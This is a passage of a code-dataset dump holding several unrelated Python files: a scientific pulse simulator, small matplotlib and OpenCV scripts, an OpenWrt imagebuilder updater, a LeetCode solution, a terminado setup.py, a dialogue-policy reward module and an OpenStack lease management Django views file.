self.vimiv.thumbnail.move_direction(direction)\n else:\n self.vimiv.image.scrolled_win.emit('scroll-child',\n scrolltypes[direction][0],\n scrolltypes[direction][1])\n return True # Deactivates default bindings (here for Arrows)\n\n def num_append(self, num):\n \"\"\"Add a new char to num_str.\"\"\"\n self.num_str += num\n # RISKY\n GLib.timeout_add_seconds(1, self.num_clear)\n self.vimiv.statusbar.update_info()\n\n def num_clear(self):\n \"\"\"Clear num_str.\"\"\"\n self.num_str = \"\"\n self.vimiv.statusbar.update_info()\n","sub_path":"vimiv/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184401344","text":"import numpy as np\r\nfrom model import model\r\nfrom load import load_data\r\nfrom predict import predict\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# Load data into matrices\r\nX, Y, X_test, Y_test = load_data()\r\nm = Y.shape[1]\r\nm_test = Y_test.shape[1]\r\n\r\n# Set parameters for training\r\nlayers = [X.shape[0], 20, 7, 5, 1]\r\nlearning_rate = 0.0075\r\niterations = 2500\r\n\r\n# Standardize data to have feature values between 0 and 1\r\nX = X / 255\r\nX_test = X_test / 255\r\n\r\n# Train the model\r\nparameters, cost_history = model(X, Y, layers, learning_rate, iterations, print_cost=True)\r\n\r\n# Compute and display the accuracy of the model on the training and test sets\r\npredictions_train = predict(X, parameters)\r\npredictions_test = predict(X_test, parameters)\r\nprint(\"Accuracy on training set: \" + str(np.sum((predictions_train == Y) / m)))\r\nprint(\"Accuracy on test set: \" + str(np.sum((predictions_test == Y_test) / m_test)))\r\n\r\n# Plot the cost history as a function of the iterations\r\nplt.plot(np.squeeze(cost_history))\r\nplt.ylabel('cost')\r\nplt.xlabel('iterations (per tens)')\r\nplt.title(\"Learning rate =\" + str(learning_rate))\r\nplt.show()\r\n","sub_path":"test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"580016644","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAn interactive simulation of a CAP pulse as it travels through a Silicon slab.\n\"\"\"\n\nimport os\nimport sys\nimport yaml\nimport numpy as np\nfrom scipy.interpolate import InterpolatedUnivariateSpline\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button\n\ndef parse_input(infile):\n ''' parses the YAML input file, returns dictionary with values '''\n with open(infile) as data_file:\n params = yaml.load(data_file)\n return params\n\ndef load_abs(infile):\n \"\"\" loads the absorption data, and creates splines for the parameters \"\"\"\n energy, alpha, reflc = np.genfromtxt(infile, unpack=True, usecols=(0, 2, 6))\n splalpha = InterpolatedUnivariateSpline(energy, alpha, ext=2)\n splreflc = InterpolatedUnivariateSpline(energy, reflc, ext=2)\n return energy, splalpha, splreflc\n\ndef load_coords(infile):\n \"\"\" loads the coordinates from the xyz file \"\"\"\n coordinates = np.genfromtxt(infile, unpack=True, usecols=(1, 2, 3), skip_header=2)\n return coordinates\n\ndef displace(center, pos, fluence, epump, alpha, rpump):\n \"\"\" defines the pulse as a function of physical parameters \"\"\"\n pre1 = (alpha * (1 - rpump) * fluence) / (2 * epump * DENS * VELO**2)\n pre2 = - (EDEF + HDEF) + (3*BULK*BETA/HEAT) * (epump - BGAP)\n disp = -((pre1 * pre2)/(2 * alpha)) * \\\n (np.exp(alpha * (-pos + center)) * (np.sign(-pos + center) - 1) +\\\n np.exp(alpha * (pos - center)) * (np.sign(pos - center) - 1))\n return disp\n\ndef sliders_on_changed(val):\n \"\"\" updates the plot with the slider movement \"\"\"\n pulse = displace(POS_SLIDER.val, ZCOORD, FLUENCE_SLIDER.val * 1e-3 * 1e-16 * 1e20,\n EPUMP_SLIDER.val, ALPHA(EPUMP_SLIDER.val) * 1e-8, RPUMP(EPUMP_SLIDER.val))\n pulse[pulse > THRESH_SLIDER.val*LEND/100] = 0\n LABEL1.set_text('Atoms displaced: {}'.format((np.abs(pulse) > (THRESH_SLIDER.val+1e-1)*LEND/100).sum()))\n LABEL3.set_text(r'$D_{{\\mathrm{{max}}}} = {:.3f}\\times L_{{\\mathrm{{diag}}}}$ = {:.3f} Å'.format(np.abs(pulse).max()/LEND, np.abs(pulse).max()))\n LABEL4.set_text(r'$\\alpha$ = {:.2e} cm$^{{-1}}$'.format(float(ALPHA(EPUMP_SLIDER.val))))\n LABEL5.set_text(r'$R_{{\\mathrm{{pump}}}}$ = {:.2f}'.format(float(RPUMP(EPUMP_SLIDER.val))))\n psele = pulse[0:-1:int(len(ZCOORD)/10)]\n LINE.set_ydata(pulse)\n DOTS.set_ydata(pulse)\n STRUCL.set_ydata(ZCOORD+pulse)\n STRUCD.set_ydata(ZCOORD+pulse)\n THRESH.set_ydata(THRESH_SLIDER.val*LEND/100)\n labels = ['{:2.1f} %'.format(i*100/LEND) for i in psele]\n for label, xpos, ypos in zip(labels, ZSELE, psele):\n TEXT[xpos].set_position((xpos, ypos))\n TEXT[xpos].set_text(label)\n AX0.relim()\n AX0.autoscale_view()\n FIG.canvas.draw_idle()\n\ndef reset(event):\n \"\"\" resets the plot when the button is clicked \"\"\"\n POS_SLIDER.reset()\n THRESH_SLIDER.reset()\n EPUMP_SLIDER.reset()\n FLUENCE_SLIDER.reset()\n\n################################################################################\n################################################################################\n\n## Parses input file\nINFILE = sys.argv[1]\nVARS = parse_input(INFILE)\n\n## Load files\nXCOORD, YCOORD, ZCOORD = load_coords(os.path.abspath(VARS['generate']['atoms']['xangst']))\nENERGY, ALPHA, RPUMP = load_abs(os.path.abspath(VARS['generate']['material']['absorption']))\n\n# Constants for silicon # consider reading from file?\nEDEF = 9.5 # electron deformation potential (eV)\nHDEF = 5.0 # hole deformation potential (eV)\nBULK = VARS['generate']['material']['bulkmod'] * 1e9 # Bulk modulus (GPa, converted to Pascal)\nBETA = 2.56e-6 # linear thermal expansion coefficient (K^{-1})\nHEAT = VARS['generate']['material']['specific'] * 1e6 # specific heat per unit volume (J cm^{-3} K^{-1} converted to J m^{-3} K^{-1} to cancel out Pascals)\nDENS = VARS['generate']['material']['rho'] * 1e-3 * 1e-24 # mass density (g cm^{-3}, converted to kg A^{-3})\nVELO = VARS['generate']['material']['vsound'] * 1e10 # longitudinal velocity of sound (m s^{-1}, converted to A s^{-1}) # 9040 m/s in Lundstrom Table 2.1\nBGAP = 3.4 # direct band gap (eV) # indirect 1.10 eV\n\n\nINIT_EPUMP = VARS['generate']['beam']['Epump'] # photon energy of the pump beam (eV)\nINIT_RPUMP = RPUMP(INIT_EPUMP) # reflectance of Si for pump beam\nINIT_ALPHA = ALPHA(INIT_EPUMP) # absorption coefficient of Si for pump beam (cm^{-1})\nINIT_FLUEN = 0.00 # fluence (mJ cm^{-2})\nINIT_THRES = 0.00\nINIT_POSIT = (ZCOORD.max() + ZCOORD.min())/2\nLEND = VARS['generate']['atoms']['reflen']\n\n################################################################################\n################################################################################\n\n# Set up basic plot elements\nAXCOLOR = 'lightgoldenrodyellow'\nplt.rcParams[\"font.size\"] = \"11\"\n\nFIG, (AX0, AX1) = plt.subplots(ncols=2, figsize=(12, 6), gridspec_kw={'width_ratios':[4, 1]})\nFIG.subplots_adjust(top=0.95, bottom=0.32, left=0.08, right=0.97)\n\nFIG.canvas.set_window_title('CAP Pulse Simulator')\nAX0.set_xlabel(r'$z$ (Å)')\nAX0.set_ylabel(r'Displacement in $z$ (Å)')\nAX0.set_xlim([ZCOORD.max(), ZCOORD.min()])\nAX0.set_ylim([-0.60, 0.60])\nAX1.set_xlabel(r'$x$ (Å)')\nAX1.set_ylabel(r'$z$ (Å)')\nAX1.set_ylim([INIT_POSIT-10, INIT_POSIT+10])\nAX1.set_xlim([-3, 3])\n\n\n# Set up sliders on the plot\nPOS_SLIDER_AX = FIG.add_axes([0.15, 0.18, 0.75, 0.03], facecolor=AXCOLOR)\nPOS_SLIDER = Slider(POS_SLIDER_AX, 'Position (Å)', ZCOORD.min(), ZCOORD.max(), valinit=INIT_POSIT)\nTHRESH_SLIDER_AX = FIG.add_axes([0.15, 0.13, 0.75, 0.03], facecolor=AXCOLOR)\nTHRESH_SLIDER = Slider(THRESH_SLIDER_AX, 'Threshold (%)', -50, 50, valinit=INIT_THRES)\nEPUMP_SLIDER_AX = FIG.add_axes([0.15, 0.08, 0.75, 0.03], facecolor=AXCOLOR)\nEPUMP_SLIDER = Slider(EPUMP_SLIDER_AX, r'$E_{{\\mathrm{{pump}}}}$ (eV)', 1.240, 4.959, valinit=INIT_EPUMP)\nFLUENCE_SLIDER_AX = FIG.add_axes([0.15, 0.03, 0.75, 0.03], facecolor=AXCOLOR)\nFLUENCE_SLIDER = Slider(FLUENCE_SLIDER_AX, r'Fluence (mJ/cm$^{2}$)', 0.00, 1.0, valinit=INIT_FLUEN)\nRESET_AX = plt.axes([0.01, 0.23, 0.05, 0.05])\nRESET_BUTTON = Button(RESET_AX, 'RESET', color='#e83600')\n\n################################################################################\n################################################################################\n\n# Calculate initial displacement pulse, and select some initial points along it\nPULSE = displace(INIT_POSIT, ZCOORD, INIT_FLUEN * 1e-3 * 1e-16 * 1e20, INIT_EPUMP, INIT_ALPHA * 1e-8, INIT_RPUMP)\nZSELE = ZCOORD[0:-1:int(len(ZCOORD)/10)]\nPSELE = PULSE[0:-1:int(len(ZCOORD)/10)]\n\n# Create percentage labels that go over each selected atom\nLABELS = ['{:2.1f} %'.format(i*100/LEND) for i in PSELE]\nLABEL1 = AX0.annotate(s='Atoms displaced: {}'.format((PULSE > INIT_THRES*LEND/100).sum()),\n xy=(0.10, 0.90), xycoords='figure fraction')\nLABEL2 = AX0.annotate(s=r'$L_{{\\mathrm{{diag}}}}$ = {:.2f} Å'.format(LEND),\n xy=(0.10, 0.85), xycoords='figure fraction')\nLABEL3 = AX0.annotate(s=r'$D_{{\\mathrm{{max}}}} ={:.3f}\\times L_{{\\mathrm{{diag}}}}$ = {:.3f} Å'.format(np.abs(PULSE).max()/LEND, np.abs(PULSE).max()),\n xy=(0.10, 0.80), xycoords='figure fraction')\nLABEL4 = AX0.annotate(s=r'$\\alpha$ = {:.2e} cm$^{{-1}}$'.format(float(INIT_ALPHA)),\n xy=(0.58, 0.90), xycoords='figure fraction')\nLABEL5 = AX0.annotate(s=r'$R_{{\\mathrm{{pump}}}}$ = {:.2f}'.format(float(INIT_RPUMP)),\n xy=(0.58, 0.85), xycoords='figure fraction')\nTEXT = {xpos: AX0.annotate(label, xy=(xpos, ypos), clip_on=True)\n for label, xpos, ypos in zip(LABELS, ZSELE, PSELE)}\n\n# Plot inital atoms, pulse, and threshold\nTHRESH = AX0.axhline(y=0, c='red')\nAX0.plot(ZCOORD, np.zeros_like(ZCOORD), 'b.', label='')\n[LINE] = AX0.plot(ZCOORD, PULSE, 'k-', label='')\n[DOTS] = AX0.plot(ZCOORD, PULSE, 'r.', label='')\nAX1.plot(XCOORD, ZCOORD, 'k--', linewidth=1, label='')\nAX1.plot(XCOORD, ZCOORD, 'bo', label='', ms=8, mfc='none')\n[STRUCL] = AX1.plot(XCOORD, ZCOORD+PULSE, 'k-', label='')\n[STRUCD] = AX1.plot(XCOORD, ZCOORD+PULSE, 'ro', ms=8, label='')\n\n################################################################################\n################################################################################\n\n# Refresh plot as sliders are changed\nPOS_SLIDER.on_changed(sliders_on_changed)\nTHRESH_SLIDER.on_changed(sliders_on_changed)\nEPUMP_SLIDER.on_changed(sliders_on_changed)\nFLUENCE_SLIDER.on_changed(sliders_on_changed)\nRESET_BUTTON.on_clicked(reset)\n\n# Display the plot on screen\nplt.show()\n","sub_path":"00-simulator.py","file_name":"00-simulator.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"587298323","text":"import threading\nimport signal\nimport logging\nimport time\nimport os.path\n\nfrom worker.imagebuilder import ImageBuilder\nfrom utils.config import Config\nfrom utils.database import Database\n\nclass Updater(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.log = logging.getLogger(__name__)\n self.log.info(\"log initialized\")\n self.config = Config()\n self.log.info(\"config initialized\")\n self.db = Database(self.config)\n self.log.info(\"db initialized\")\n\n def run(self):\n self.log.info(\"run updater\")\n while True:\n outdated_subtarget = self.db.get_subtarget_outdated()\n\n if not outdated_subtarget:\n self.log.debug(\"updater sleeping\")\n time.sleep(60)\n else:\n self.log.info(\"found outdated_subtarget %s\", outdated_subtarget)\n distro, release, target, subtarget = outdated_subtarget\n imagebuilder = ImageBuilder(distro, str(release), target, subtarget)\n self.log.info(\"initializing imagebuilder\")\n if not imagebuilder.created():\n self.log.info(\"setup imagebuilder\")\n imagebuilder.run()\n self.log.info(\"parse profiles/default packages\")\n\n info = imagebuilder.parse_info()\n if info:\n self.db.insert_profiles(distro, release, target, subtarget, *info)\n else:\n logging.error(\"could not receive profiles of %s/%s\", target, subtarget)\n self.db.subtarget_synced(distro, release, target, subtarget)\n continue\n\n if os.path.exists(os.path.join(\n self.config.get_folder(\"imagebuilder_folder\"), distro,\n release, target, subtarget, \"target/linux\", target,\n \"base-files/lib/upgrade/platform.sh\")):\n self.log.info(\"%s target is supported\", target)\n self.db.insert_supported(distro, release, target)\n else:\n self.log.info(\"%s is not supported\", target)\n\n self.log.info(\"parse packages\")\n packages = imagebuilder.parse_packages()\n if packages:\n self.db.insert_packages_available(distro, release, target, subtarget, packages)\n else:\n self.log.warning(\"could not get packages for %s, %s %s\",\n distro, release, target)\n\n self.db.subtarget_synced(distro, release, target, subtarget)\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n u = Updater()\n u.run()\n","sub_path":"updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"428563393","text":"import numpy as np\nimport matplotlib.pyplot as plt\nplt.clf() #Clear the current figure (prevents multiple labels)\n\nlabelfont = {\n 'family' : 'sans-serif', # (cursive, fantasy, monospace, serif)\n 'color' : 'black', # html hex or colour name\n 'weight' : 'normal', # (normal, bold, bolder, lighter)\n 'size' : 14, # default value:12\n }\n\ntitlefont = {\n 'family' : 'serif',\n 'color' : 'black',\n 'weight' : 'bold',\n 'size' : 16,\n }\n\npi = np.pi\nx = np.linspace(-4, 4, 100)\nf1 = x**2\nf2 = x**3\nplt.plot(x, f1,\n 'darkgreen', # colour\n linestyle='-', # line style\n linewidth=3, # line width\n label='$\\sin(x)$') # plot label\n\naxes = plt.gca()\naxes.set_xlim([-4, 4]) # x-axis bounds\naxes.set_ylim([0, 16]) # y-axis bounds\n\nlegend = plt.legend(loc='upper right', shadow=True, fontsize='small')\n\nplt.title('Funciones Trigonometricas', fontdict=titlefont)\nplt.xlabel('Angulo (en radianes)', fontdict=labelfont)\nplt.ylabel('Funcion', fontdict=labelfont)\n\nplt.subplots_adjust(left=0.15) # prevents overlapping of the y label\nplt.grid() # Le agrega la grilla\nplt.show()\n","sub_path":"copia_radianes.py","file_name":"copia_radianes.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"267589763","text":"import numpy as np\n\ndef calc_quad_root_v1(a, b, c):\n D = b**2 - 4*a*c\n x1 = (-b + np.sqrt(D))/(2*a)\n x2 = (-b - np.sqrt(D))/(2*a)\n return x1, x2\n\ndef calc_quad_root_v2(a, b, c):\n D = b**2 - 4*a*c\n x1 = -2*c/(b + np.sqrt(D))\n x2 = -2*c/(b - np.sqrt(D))\n return x1, x2\n\na = 1.0\nb = 3000.001\nc = 3.0\n\nx1_true = -0.001\nx2_true = -3000.0\n\nx1, x2 = calc_quad_root_v1(a, b, c)\nprint(\"Using 1st formula: appprox roots: \", x1, \" \", x2)\n\nx1, x2 = calc_quad_root_v2(a, b, c)\nprint(\"Using 2nd formula: appprox roots: \", x1, \" \", x2)\n\nprint(\"True roots: \", x1_true, \" \", x2_true)","sub_path":"chapra_7th/ch03/chapra_example_3_8.py","file_name":"chapra_example_3_8.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"55159427","text":"#import necsessary files\r\nimport numpy as np \r\nimport cv2\r\n#read the image using imread command\r\nimg=cv2.imread('CKOFy3m.jpg',1)\r\n\r\n#convert color image to gray\r\nimg2gray=cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n#apply threshold\r\nret, mask= cv2.threshold(img,220,255,cv2.THRESH_BINARY)\r\n#display image\r\ncv2.imshow('charizard',mask)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"char.py","file_name":"char.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"179727037","text":"#!/usr/local/bin/python2.7\n\"\"\"\nViews module manage interface between user and openstack-lease-it.\n\nlease_it.views provide interaction based on REST good practice.\n\"\"\"\nimport ast\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom lease_it import backend\nfrom lease_it.backend import Exceptions as bckExceptions # pylint: disable=ungrouped-imports\nfrom lease_it.datastore.ModelAccess import InstancesAccess\nfrom lease_it.datastore.Exceptions import StillRunning\n\nfrom openstack_lease_it.settings import GLOBAL_CONFIG, LOGGER\nfrom openstack_lease_it.decorators import superuser_required\n\n# We load backend specify by configuration file\nBACKEND_PLUGIN = getattr(backend, \"{0}Connection\".format(GLOBAL_CONFIG['BACKEND_PLUGIN']))\nBACKEND = BACKEND_PLUGIN() # pylint: disable=not-callable\n\n\n@login_required\ndef dashboard(request):\n \"\"\"\n The default dashboard\n\n :param request: Web request\n :return: HTML Rendering\n \"\"\"\n return render(request, 'dashboard/dashboard.html')\n\n\n@login_required\ndef flavors(request): # pylint: disable=unused-argument\n \"\"\"\n View for flavors request\n\n :param request: Web request\n :return: JsonResponse w/ list of flavor and details values\n \"\"\"\n # We call our method\n response = BACKEND.flavors()\n return JsonResponse(response)\n\n\n@login_required\ndef instances(request): #pylint: disable=unused-argument\n \"\"\"\n View for instances list\n\n :param request: Web request\n :return: JsonResponse w/ list of instances and details\n \"\"\"\n response = list()\n # Retrieve filtered parameter on GET. It's used to display all instances or just user instances\n # In all cases, if user is not superuser, only user instances are displayed\n if 'filtered' in request.GET:\n filtered = ast.literal_eval(request.GET['filtered'])\n else:\n # By default, we filter based on user_id\n filtered = True\n # By default, we just list user instances, not all instances\n if not request.user.is_superuser:\n # If user is superuser and user are requesting admin view of instances\n # We ask a full list of instances\n filtered = True\n\n # We retrieve data from backend\n data_instances = BACKEND.instances(request, filtered)\n data_users = BACKEND.users()\n data_projects = BACKEND.projects()\n\n # We merge user and project information w/ instances\n for data_instance in data_instances:\n try:\n project = \"{name}\".format(\n **data_projects[data_instances[data_instance]['project_id']])\n except KeyError:\n project = data_instances[data_instance]['project_id']\n\n try:\n user = \"{name}\".format(\n **data_users[data_instances[data_instance]['user_id']])\n except KeyError:\n user = data_instances[data_instance]['user_id']\n response.append({\n 'id': data_instances[data_instance]['id'],\n 'name': data_instances[data_instance]['name'],\n 'created_at': data_instances[data_instance]['created_at'],\n 'lease_end': data_instances[data_instance]['lease_end'],\n 'project': project,\n 'user': user\n })\n return JsonResponse(response, safe=False)\n\n\n@login_required\ndef instance(request, instance_id):\n \"\"\"\n This is view used to for a new lease on a specific instance (http://url/instances/instance_id)\n a PermissionDenied exception is raised decided by backend. Mainly if instance is not owned by\n user but see Backend comment.\n\n :param request: Web request\n :param instance_id: retrieve from url\n :return: JsonResponse\n \"\"\"\n response = {\n 'status': 'success'\n }\n try:\n instance_info = BACKEND.lease_instance(request, instance_id)\n response['instance'] = instance_info\n except bckExceptions.PermissionDenied as error:\n LOGGER.info(\"Permission Denied to lease %s\", instance_id)\n response = {\n 'status': 'error',\n 'message': error.message\n }\n return JsonResponse(response)\n\n\n@superuser_required\ndef users(request): # pylint: disable=unused-argument\n \"\"\"\n View for users\n\n :param request: Web request\n :return: JsonResponse w/ list of users and details\n \"\"\"\n response = BACKEND.users()\n return JsonResponse(response)\n\n\n@superuser_required\ndef databases(request): # pylint: disable=unused-argument\n \"\"\"\n View for all entries on database, used to delete old instances data\n\n :param request: Web request\n :return: JSonResponse w/ list of database entries\n \"\"\"\n response = InstancesAccess.get_all()\n # By default, JsonResponse refuse to serialize a list to a Json list. safe=False allow it.\n return JsonResponse(response, safe=False)\n\n\n@superuser_required\ndef database(request, instance_id): # pylint: disable=unused-argument\n \"\"\"\n This view is used to delete instance from database\n\n :param request: Web request\n :param instance_id: instance id\n :return: JSonResponse w/ status of deletion\n \"\"\"\n response = {\n 'status': 'success',\n 'instance': {'id': instance_id}\n }\n try:\n InstancesAccess.delete(instance_id)\n except StillRunning as error:\n response = {\n 'status': 'failed',\n 'message': error.message\n }\n return JsonResponse(response)\n","sub_path":"openstack_lease_it/lease_it/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"455063434","text":"import scipy.misc\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndef resize_img(image, out_name):\n\timg_arr = scipy.misc.imread(image)\n\trs_img_arr = scipy.misc.imresize(img_arr, (300, 400))\n\trs_img = Image.fromarray(rs_img_arr, 'RGB')\n\trs_img.show()\n\trs_img.save(out_name)\n\n#resize_img('image/monet.jpg', 'image/style.jpg')\nresize_img('image/kusamayayoi.jpg', 'image/style_kusamayayoi.jpg')\n#resize_img('image/turtle.jpg', 'image/content_test.jpg')\n","sub_path":"image_resize.py","file_name":"image_resize.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"77560294","text":"#-*-coding:utf-8 -*-\n\"\"\"\n 21. Merge Two Sorted Lists\n Directed by user zhongch4g\n current system date 2017/5/3\n\"\"\"\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n newList = ListNode(0)\n relist = newList\n while l1 is not None and l2 is not None:\n if l1.val > l2.val:\n newList.next = l2\n l2 = l2.next\n newList = newList.next\n else:\n newList.next = l1\n l1 = l1.next\n newList = newList.next\n if not l1:\n newList.next = l2\n return relist.next\n if not l2:\n newList.next = l1\n return relist.next","sub_path":"LeetCode/21. Merge Two Sorted Lists.py","file_name":"21. Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160950538","text":"from setuptools import setup, find_packages\nimport io\n\nwith io.open('terminado/__init__.py', encoding='utf-8') as fid:\n for line in fid:\n if line.startswith('__version__'):\n version = line.strip().split()[-1][1:-1]\n break\n\n\nsetup_args = dict(\n name = \"terminado\",\n version = version,\n author = \"Jupyter Development Team\",\n author_email = \"jupyter@googlegroups.com\",\n url = \"https://github.com/jupyter/terminado\",\n packages = find_packages(),\n include_package_data = True,\n description = \"Tornado websocket backend for the Xterm.js Javascript terminal emulator library.\",\n long_description = open(\"README.rst\").read(),\n long_description_content_type=\"text/x-rst\",\n install_requires = [\n \"ptyprocess;os_name!='nt'\",\n \"pywinpty (>=1.1.0);os_name=='nt'\",\n \"tornado (>=4)\",\n ],\n extras_require = dict(test=['pytest']),\n python_requires=\">=3.6\",\n classifiers=[\n \"Environment :: Web Environment\",\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Terminals :: Terminal Emulators/X Terminals\",\n ]\n)\n\n\nif __name__ == '__main__':\n setup(**setup_args)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"483267247","text":"import os\nimport torch\nimport logging\nimport torch.nn as nn\nimport numpy as np\nfrom convlab2.util.train_util import to_device\nimport torch.nn as nn\nfrom torch import optim\n\nimport zipfile\nimport sys\nimport matplotlib.pyplot as plt\nimport pickle\n\nclass Reward_predict(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(Reward_predict, self).__init__()\n self.encoder_1 = nn.LSTM(input_size, output_size, batch_first=True, bidirectional=False)\n self.encoder_2 = nn.LSTM(output_size, output_size)\n\n self.m = nn.Sigmoid()\n self.loss = nn.BCELoss(size_average= False,reduce= True)\n self.cnn_belief = nn.Linear(input_size-output_size,output_size)\n self.cnn_output = nn.Linear(output_size,output_size)\n\n def forward(self, input_feature, input_belief, target):\n \"\"\"\n :param input_feature: 549\n :param input_belief: 340\n :param target: 209\n :return:\n \"\"\"\n # to construct the batch first, then we could compute the loss function for this stuff, simple and easy.\n _, (last_hidden, last_cell) = self.encoder_1(input_feature)\n # second Part\n\n _, (predict_action, last_cell) = self.encoder_2(self.cnn_belief(input_belief), (last_hidden, last_cell))\n\n loss = self.loss(self.m(self.cnn_output(predict_action)),target)\n return loss\n\n def compute_reward(self, input_feature, input_belief, input_predict_RL):\n # compute the reward based on the very easy methocd: product of two vectors\n _, (last_hidden, last_cell) = self.encoder_1(input_feature)\n # second Part\n _, (predict_action, last_cell) = self.encoder_2(self.cnn_belief(input_belief), (last_hidden, last_cell))\n action_prob = self.m(self.cnn_output(predict_action))\n reward = action_prob.unsqueeze(0) * input_predict_RL.unsqueeze(0)\n res = torch.sum(reward.unsqueeze(0).unsqueeze(0))\n return res\n\n def bellman_equation(self,r, mask, gamma):\n \"\"\"\n we save a trajectory in continuous space and it reaches the ending of current trajectory when mask=0.\n :param r: reward, Tensor, [b]\n :param mask: indicates ending for 0 otherwise 1, Tensor, [b]\n :return: V-target(s), Tensor\n \"\"\"\n batchsz = r.size(0)\n\n # v_target is worked out by Bellman equation.\n v_target = torch.Tensor(batchsz)\n\n prev_v_target = 0\n for t in reversed(range(batchsz)):\n # mask here indicates a end of trajectory\n # this value will be treated as the target value of value network.\n # mask = 0 means the immediate reward is the real V(s) since it's end of trajectory.\n # formula: V(s_t) = r_t + gamma * V(s_t+1)\n v_target[t] = r[t] + gamma * prev_v_target * mask[t]\n # update previous\n prev_v_target = v_target[t]\n\n return v_target","sub_path":"convlab2/policy/mle/idea2_predict_next_action.py","file_name":"idea2_predict_next_action.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"178371625","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /media/storage/eyes/virtualenv/pyte/lib/python3.5/site-packages/pyte/util.py\n# Compiled at: 2016-04-20 01:32:41\n# Size of source mod 2**32: 2533 bytes\n\"\"\"\nMiscellaneous utilities.\n\"\"\"\nimport collections, dis, sys\nfrom . import tokens\nimport pyte\n\ndef generate_simple_call(opcode, index):\n bs = b''\n bs += opcode.to_bytes(1, byteorder='little')\n if isinstance(index, int):\n bs += index.to_bytes(2, byteorder='little')\n else:\n bs += index\n return bs\n\n\ndef generate_bytecode_from_obb(obb: object, previous: bytes) -> bytes:\n if isinstance(obb, pyte.superclasses._PyteOp):\n return obb.to_bytes(previous)\n if isinstance(obb, (pyte.superclasses._PyteAugmentedComparator,\n pyte.superclasses._PyteAugmentedValidator._FakeMathematicalOP)):\n return obb.to_bytes(previous)\n if isinstance(obb, pyte.superclasses._PyteAugmentedValidator):\n obb.validate()\n return obb.to_load()\n if isinstance(obb, int):\n return obb.to_bytes((obb.bit_length() + 7) // 8, byteorder='little') or b''\n if isinstance(obb, bytes):\n return obb\n raise TypeError('`{}` was not a valid bytecode-encodable item'.format(obb))\n\n\ndef generate_load_global(index) -> bytes:\n return generate_simple_call(tokens.LOAD_GLOBAL, index)\n\n\ndef generate_load_fast(index) -> bytes:\n \"\"\"\n Generates a LOAD_FAST operation.\n \"\"\"\n return generate_simple_call(tokens.LOAD_FAST, index)\n\n\ndef generate_load_const(index) -> bytes:\n return generate_simple_call(tokens.LOAD_CONST, index)\n\n\ndef flatten(l):\n for el in l:\n if isinstance(el, collections.Iterable) and not isinstance(el, (str, bytes)):\n for sub in flatten(el):\n yield sub\n\n else:\n yield el\n\n\ndef _get_name_info(name_index, name_list):\n \"\"\"Helper to get optional details about named references\n\n Returns the dereferenced name as both value and repr if the name\n list is defined.\n Otherwise returns the name index and its repr().\n \"\"\"\n argval = name_index\n if name_list is not None:\n try:\n argval = name_list[name_index]\n except IndexError:\n return ('(unknown)', '(unknown)')\n\n argrepr = argval\n else:\n argrepr = repr(argval)\n return (\n argval, argrepr)\n\n\ndis._get_name_info = _get_name_info\nif sys.version_info[0:2] < (3, 4):\n from pyte import backports\n backports.apply()","sub_path":"pycfiles/pytec-1.0.0.linux-x86_64.tar/util.cpython-35.py","file_name":"util.cpython-35.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"518659740","text":"from lxml import etree\nimport requests\n\n\nclass TuKu(object):#初始化\n #模拟浏览器来访问\n def __init__(self):\n self.header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 